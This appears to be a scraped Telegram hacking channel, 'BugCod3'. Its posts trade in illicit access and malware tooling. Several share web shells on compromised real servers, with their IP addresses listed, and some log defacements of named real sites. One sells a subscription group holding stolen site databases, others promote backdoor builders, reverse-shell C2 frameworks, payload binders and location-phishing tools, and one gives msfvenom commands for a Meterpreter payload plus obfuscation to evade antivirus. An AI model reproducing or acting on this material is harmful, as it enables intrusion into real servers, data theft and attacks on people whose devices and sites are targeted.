BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
408 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
Very useful tool for scanning the directories of a website

⬇️ Download
🦊 GitHub

#Security #Dirsearch #RedTeam #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Practice shell

PHP: 7.4.33
Safe Mode: OFF

ServerIP: 92.204.219.243 🇫🇷

HDD: Total:2014.75 GB Free:906.01 GB [44%]

Useful : gcc cc ld make php perl python ruby tar gzip

Downloader: wget lynx curl

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
We have a VIP group where we put noscripts and databases of sites, etc., you can also buy a subnoscription and become a member.

#Notification

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👎1
PHP: 7.4.33

Safe Mode: OFF

ServerIP: 160.153.129.228 🇳🇱

HDD: Total:3240.13 GB
Free:1584.15 GB [48%]

Useful : gcc cc ld make php perl python ruby tar gzip

Downloader: wget lynx curl

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Microsoft Windows 11 - 'cmd.exe' Denial of Service

Platform:
Windows

Type: dos

Exploit-db

Dwonload

#Windows
#Exploit #Python

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Villain 🦹‍♀️

Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines).

GitHub

#Python #RedTeam #CyberSecurity

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍1
Site:
https://baoruba.com

Mirror-h:
https://mirror-h.org/zone/5024333/

Country: 🇺🇸

#Deface

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Site:
http://climasist.com.br
http://civ.vn

Mirror-h:
https://mirror-h.org/search/hacker/59354/

Country: 🇺🇸 🇳🇦

#Deface

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
2
PHP: 7.4.33

Safe Mode: OFF

ServerIP: 103.159.51.253 🇳🇦

HDD: Total:14.64 GB
Free:1.25 GB [8%]

useful:--------------

Downloader: --------------

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : OFF

SoftWare: nginx/1.21.0

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍2
A Tool With Attractive Capabilities.

Features:

⚪️ Obtain Device Information Without Any Permission !
⚪️ Access Location [SMARTPHONES]
⚪️ Access Webcam
⚪️ Access Microphone

GitHub

#Python #social_engineering_attacks #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
2
A Massive Exploiting Tool

TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus

Features !

⚪️ Fully Automating MSFvenom & Metasploit.
⚪️ Local or remote listener Generation.
⚪️ Easily Make Backdoor by category Operating System.
⚪️ Generate payloads in Various formats.
⚪️ Bypass anti-virus backdoors.
⚪️ File pumper that you can use for increasing the size of your files.
⚪️ The ability to detect external IP & Interface address .
⚪️ Automatically creates AutoRun files for USB / CDROM exploitation

GitHub

#C #Rat #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
🔥1
Python Obfuscator for FUD Python Code.

Example: Creating FUD Meterpreter Python Payload

1. Generate Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

2. Obfuscate Payload
onelinepy -m /one_line/base64 --noscript payload.txt -i 3 --output obfuscated_payload.txt

GitHub

#Python #bypass_antivirus #FUD #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
PHP: 7.4.33

Safe Mode: OFF

ServerIP: 208.109.68.144 🇺🇸

HDD: Total:1007.81 GB
Free:741.34 GB [73%]

Useful : gcc cc ld make php perl python ruby tar gzip

Downloader: wget lynx curl

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2020-0796 Remote overflow POC

CVE-2020–0796, is pre-remote code execution vulnerability that resides in the Server Message Block 3.0 (SMBv3) network communication protocol

Which devices does the CVE-2020-0796 affect?

+ Windows 10 Version 1903 for 32-bit Systems

+ Windows 10 Version 1903 for ARM64-based Systems

+ Windows 10 Version 1903 for x64-based Systems

+ Windows 10 Version 1909 for 32-bit Systems

+ Windows 10 Version 1909 for ARM64-based Systems

+ Windows 10 Version 1909 for x64-based Systems

+ Windows Server, version 1903 (Server Core installation)

+ Windows Server, version 1909 (Server Core installation)


GitHub
GitHub

#CVE #Microsoft #POC

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
A powerful tool to bind payloads to any files

Download

#Binder #Payloads #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
SEEKER

A good tool to identify and get a quick information from the user

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your location like many popular location based websites

GitHub

#System_Information #GeoLocation #Tools

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
👍1
👍1
PHP: 5.6.36

Safe Mode: OFF

ServerIP: 2a00:f940:2:2:1:4:0:93 🇷🇺

HDD: Total:3475.35 GB
Free:667.08 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gz ip nc

Downloader: wget links curll wp-mirror

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3